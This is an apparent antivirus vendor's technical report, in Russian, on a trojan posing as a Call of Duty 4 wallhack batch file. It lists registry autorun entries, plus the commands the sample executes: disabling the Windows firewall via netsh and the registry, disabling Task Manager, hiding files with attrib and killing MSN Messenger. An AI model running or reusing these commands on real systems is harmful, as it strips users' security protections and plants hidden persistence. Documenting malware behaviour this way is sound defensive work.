Техническая информация
Для обеспечения автозапуска и распространения:
Модифицирует следующие ключи реестра:
- [<HKLM>\SOFTWARE\Classes\.exe] '' = 'WMAFile'
- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices] 'Pwner' = '%WINDIR%\img005488.bat'
- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'PWNAGE' = '<DRIVERS>\img005488.bat'
Вредоносные функции:
Для обхода брандмауэра удаляет или модифицирует следующие ключи реестра:
- [<HKLM>\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile] 'DoNotAllowExceptions' = '00000000'
- [<HKLM>\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile] 'EnableFirewall' = '00000000'
Запускает на исполнение:
- <SYSTEM32>\reg.exe add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoUserNameInStartMenu" /d "1" /f
- <SYSTEM32>\attrib.exe +r +a +s +h <SYSTEM32>
- <SYSTEM32>\reg.exe add HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices /v Pwner /t REG_SZ /d %WINDIR%\img005488.bat /f
- <SYSTEM32>\attrib.exe +s "img005488.bat"
- <SYSTEM32>\attrib.exe +r "img005488.bat"
- <SYSTEM32>\attrib.exe +h "img005488.bat"
- <SYSTEM32>\rundll32.exe user32,SwapMouseButton
- <SYSTEM32>\reg.exe add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_SZ /d 1 /f
- <SYSTEM32>\cmd.exe /c ""%TEMP%\1.tmp\cod4_wallhack_by_dvbhack 1.096.bat" "
- <SYSTEM32>\taskkill.exe /f /im msnmsgr.exe
- <SYSTEM32>\netsh.exe firewall set opmode disable
- <SYSTEM32>\reg.exe add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v PWNAGE /t REG_SZ /d <DRIVERS>\img005488.bat /f
Завершает или пытается завершить
следующие пользовательские процессы:
- msnmsgr.exe
Изменяет следующие настройки проводника Windows (Windows Explorer):
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoUserNameInStartMenu' = '1'
Изменения в файловой системе:
Создает следующие файлы:
- %WINDIR%\6876.6265
- <SYSTEM32>\15304.26833
- %WINDIR%\25528.3267
- <SYSTEM32>\26327.24267
- %WINDIR%\22655.4988
- <SYSTEM32>\16425.20415
- %WINDIR%\14319.24111
- <SYSTEM32>\8046.21596
- %WINDIR%\9568.26756
- <SYSTEM32>\16520.20742
- %WINDIR%\20422.20391
- <SYSTEM32>\16792.8869
- %WINDIR%\6172.13145
- <SYSTEM32>\243.11369
- %WINDIR%\1202.27539
- <SYSTEM32>\12187.23772
- %WINDIR%\2467.1642
- <SYSTEM32>\5174.22826
- <SYSTEM32>\16691.10167
- <SYSTEM32>\22100.1358
- %WINDIR%\4087.16165
- <SYSTEM32>\11674.17430
- %WINDIR%\12993.29558
- <SYSTEM32>\12581.5846
- %WINDIR%\20141.20512
- <SYSTEM32>\18325.12794
- %WINDIR%\6023.246
- <SYSTEM32>\17297.18065
- %WINDIR%\26450.16508
- <SYSTEM32>\1811.28567
- %WINDIR%\14064.16161
- <SYSTEM32>\14176.16703
- %WINDIR%\335.29314
- <SYSTEM32>\20269.10525
- %WINDIR%\17624.32027
- <SYSTEM32>\32642.4753
- %WINDIR%\10439.18310
- <SYSTEM32>\19885.7806
- %WINDIR%\18684.26341
- <SYSTEM32>\19863.4616
- %WINDIR%\2173.12637
- <SYSTEM32>\22818.14639
- %WINDIR%\1746.31016
- <SYSTEM32>\26388.4406
- %WINDIR%\30557.13237
- <SYSTEM32>\23318.13094
- %WINDIR%\867.16913
- <SYSTEM32>\29334.22907
- %WINDIR%\16724.4297
- <SYSTEM32>\2114.18609
- %WINDIR%\31836.984
- <SYSTEM32>\14952.6592
- %WINDIR%\8269.11745
- <SYSTEM32>\31705.30221
- %WINDIR%\16099.20515
- %WINDIR%\7432.1569
- %WINDIR%\7762.6725
- <SYSTEM32>\4599.14166
- %WINDIR%\23934.28582
- <SYSTEM32>\12578.13336
- %WINDIR%\11799.16241
- <SYSTEM32>\21884.12750
- %WINDIR%\6414.29266
- <SYSTEM32>\19523.32739
- %WINDIR%\21333.13181
- <SYSTEM32>\4219.7794
- %WINDIR%\11477.16925
- <SYSTEM32>\17927.21771
- %WINDIR%\24138.8886
- <SYSTEM32>\29207.20711
- %WINDIR%\29550.1320
- <SYSTEM32>\24209.28757
- %WINDIR%\6008.9946
- <SYSTEM32>\29272.10590
- %WINDIR%\31924.17077
- C:\273.txt
- C:\9527.txt
- C:\11378.txt
- C:\20414.txt
- C:\17595.txt
- C:\16501.txt
- C:\30333.txt
- C:\18476.txt
- C:\21225.txt
- C:\21691.txt
- C:\8292.txt
- C:\9474.txt
- C:\20712.txt
- C:\17424.txt
- C:\8197.txt
- C:\21671.txt
- C:\3840.txt
- C:\25701.txt
- C:\2580.txt
- C:\371.txt
- C:\29044.txt
- C:\5338.txt
- C:\14739.txt
- C:\16313.txt
- C:\5786.txt
- %TEMP%\1.tmp\cod4_wallhack_by_dvbhack 1.096.bat
- C:\739.txt
- C:\32288.txt
- C:\30976.txt
- C:\9826.txt
- C:\12497.txt
- C:\11996.txt
- C:\8051.txt
- C:\23558.txt
- C:\31321.txt
- C:\18472.txt
- C:\16813.txt
- %WINDIR%\5660.24070
- <SYSTEM32>\19225.812
- %WINDIR%\31117.29709
- <SYSTEM32>\11652.3331
- %WINDIR%\11447.8571
- <SYSTEM32>\2646.29590
- %WINDIR%\27048.21703
- <SYSTEM32>\22412.27824
- %WINDIR%\3585.8302
- <SYSTEM32>\16337.22608
- %WINDIR%\8886.2791
- <SYSTEM32>\928.11827
- %WINDIR%\10767.24651
- <SYSTEM32>\29809.31205
- %WINDIR%\15442.9412
- <SYSTEM32>\24742.28986
- %WINDIR%\14277.10796
- <SYSTEM32>\3505.11724
- <SYSTEM32>\895.21810
- C:\891.txt
- C:\28926.txt
- C:\5920.txt
- C:\5643.txt
- C:\600.txt
- C:\16610.txt
- C:\12594.txt
- C:\13262.txt
- C:\21581.txt
- %WINDIR%\4953.8327
- <SYSTEM32>\15366.26122
- %WINDIR%\23231.6974
- <SYSTEM32>\13339.6329
- C:\31934.txt
- C:\27487.txt
- C:\15289.txt
- C:\10425.txt
- C:\18707.txt
Удаляет следующие файлы:
- %TEMP%\1.tmp\cod4_wallhack_by_dvbhack 1.096.bat
Другое:
Ищет следующие окна:
- ClassName: '' WindowName: ''
